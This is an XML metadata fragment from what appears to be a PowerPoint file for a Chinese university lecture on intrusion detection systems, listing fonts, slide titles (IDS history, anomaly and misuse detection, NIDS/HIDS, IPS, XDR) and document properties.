      <vt:lpstr>字魂45号-冰宇雅宋</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>计算机网络安全</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>网络入侵越来越容易了！</vt:lpstr>
      <vt:lpstr>网络入侵越来越容易了！</vt:lpstr>
      <vt:lpstr>传统的网络安全防护技术存在局限</vt:lpstr>
      <vt:lpstr>主动防护技术——入侵检测</vt:lpstr>
      <vt:lpstr>第5讲 入侵检测技术</vt:lpstr>
      <vt:lpstr>1、入侵检测系统概述</vt:lpstr>
      <vt:lpstr>1、入侵检测系统概述</vt:lpstr>
      <vt:lpstr>1、入侵检测系统概述</vt:lpstr>
      <vt:lpstr>1.1 IDS发展简史</vt:lpstr>
      <vt:lpstr>1.1 IDS发展简史</vt:lpstr>
      <vt:lpstr>1.1 IDS发展简史</vt:lpstr>
      <vt:lpstr>1.1 IDS发展简史</vt:lpstr>
      <vt:lpstr>1.2 IDS工作流程</vt:lpstr>
      <vt:lpstr>1.2.1 IDS信息收集</vt:lpstr>
      <vt:lpstr>1.2.2 IDS信息分析</vt:lpstr>
      <vt:lpstr>1.2.2 IDS信息分析</vt:lpstr>
      <vt:lpstr>1.2.2 IDS信息分析</vt:lpstr>
      <vt:lpstr>1.2.3 IDS安全响应</vt:lpstr>
      <vt:lpstr>1.3 IDS分类</vt:lpstr>
      <vt:lpstr>1.3 IDS分类</vt:lpstr>
      <vt:lpstr>1.3 IDS分类</vt:lpstr>
      <vt:lpstr>1.4 IDS评价标准</vt:lpstr>
      <vt:lpstr>1.4 IDS评价标准</vt:lpstr>
      <vt:lpstr>第5讲 入侵检测技术</vt:lpstr>
      <vt:lpstr>2.1 异常检测</vt:lpstr>
      <vt:lpstr>2.1 异常检测</vt:lpstr>
      <vt:lpstr>2.1 异常检测</vt:lpstr>
      <vt:lpstr>2.1 异常检测</vt:lpstr>
      <vt:lpstr>2.1 异常检测</vt:lpstr>
      <vt:lpstr>2.1 异常检测</vt:lpstr>
      <vt:lpstr>2.1 异常检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>2.2 误用检测</vt:lpstr>
      <vt:lpstr>第5讲 入侵检测技术</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3.1 NIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.2 HIDS</vt:lpstr>
      <vt:lpstr>3.3 DIDS</vt:lpstr>
      <vt:lpstr>3.3 DIDS</vt:lpstr>
      <vt:lpstr>第5讲 入侵检测技术</vt:lpstr>
      <vt:lpstr>4.1 IDS的设计</vt:lpstr>
      <vt:lpstr>4.2 IDS的部署</vt:lpstr>
      <vt:lpstr>第5讲 入侵检测技术</vt:lpstr>
      <vt:lpstr>5.1 IDS面临的问题</vt:lpstr>
      <vt:lpstr>5.2 IDS发展方向</vt:lpstr>
      <vt:lpstr>5.3 入侵防御系统IPS</vt:lpstr>
      <vt:lpstr>5.3 入侵防御系统IPS</vt:lpstr>
      <vt:lpstr>5.3 入侵防御系统IPS</vt:lpstr>
      <vt:lpstr>5.3 入侵防御系统IPS</vt:lpstr>
      <vt:lpstr>5.3 入侵防御系统IPS</vt:lpstr>
      <vt:lpstr>5.3 入侵防御系统IPS</vt:lpstr>
      <vt:lpstr>5.3 入侵防御系统IPS</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5.4 扩展检测和响应XDR</vt:lpstr>
      <vt:lpstr>谢谢观看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网络扫描与网络监听</dc:title>
  <dc:creator>ZHANGYH</dc:creator>
  <cp:lastModifiedBy>Ling</cp:lastModifiedBy>
  <cp:revision>436</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-23T03:33:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-24T05:32:07Z</dcterms:modified>
</cp:coreProperties>
</file>